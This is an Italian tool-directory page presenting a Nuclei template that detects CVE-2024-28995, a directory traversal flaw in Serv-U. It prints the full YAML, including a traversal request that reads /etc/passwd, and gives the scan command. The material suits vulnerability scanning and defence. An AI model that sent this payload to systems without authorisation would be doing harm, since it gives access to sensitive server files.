Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-28995-Nuclei-Template — Modello Nuclei per rilevare CVE-2024-28995, una vulnerabilità di directory traversal nel server FTP Serv-U, che consente la lettura di file tramite richieste HTTP create ad arte. | Kitploit
Strumenti/GitHubGitHub/huseyinstif/cve-2024-28995-nuclei-template
Scanner di VulnerabilitàScanner di Vulnerabilità WebAnalisi delle VulnerabilitàExploitSicurezza WebPenetration Testing
GitHubhuseyinstif/cve-2024-28995-nuclei-template

CVE-2024-28995-Nuclei-Template

Modello Nuclei per rilevare CVE-2024-28995, una vulnerabilità di directory traversal nel server FTP Serv-U, che consente la lettura di file tramite richieste HTTP create ad arte.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
12 anni faNon ancora revisionato

Template Nuclei per CVE-2024-28995

Verifica la vulnerabilità di directory traversal in Serv-U versione 15.4.2 e precedenti, che consente di leggere file sensibili come /etc/passwd.

Dettagli del Template

root@kitploit:~
id: CVE-2024-28995

info:
  name: Serv-U Directory Traversal Vulnerability
  author: Hüseyin TINTAŞ
  severity: high
  description: Checks for directory traversal vulnerability in Serv-U versions 15.4.2 and below, which allows reading sensitive files like /etc/passwd.
  reference:
    - https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
  tags: pathtraversal,cve,high,serv-u

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?InternalDir=\\..\\..\\..\\..\\etc^&InternalFile=passwd"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "root:x:"
          - "daemon:x:"
          - "bin:x:"
        part: body

      - type: status
        status:
          - 200

      - type: word
        words:
          - "Server: Serv-U"
        part: header



Utilizzo

Per utilizzare questo template con Nuclei, salva il contenuto del template in un file chiamato CVE-2024-28995.yaml ed esegui il seguente comando:

root@kitploit:~
nuclei -t CVE-2024-28995.yaml -u <target-url>

Sostituisci <target-url> con l'URL del target che desideri scansionare.

Contatti

Per qualsiasi richiesta o ulteriori informazioni, puoi contattarmi tramite:

  • LinkedIn
  • Twitter
Scarica lo strumento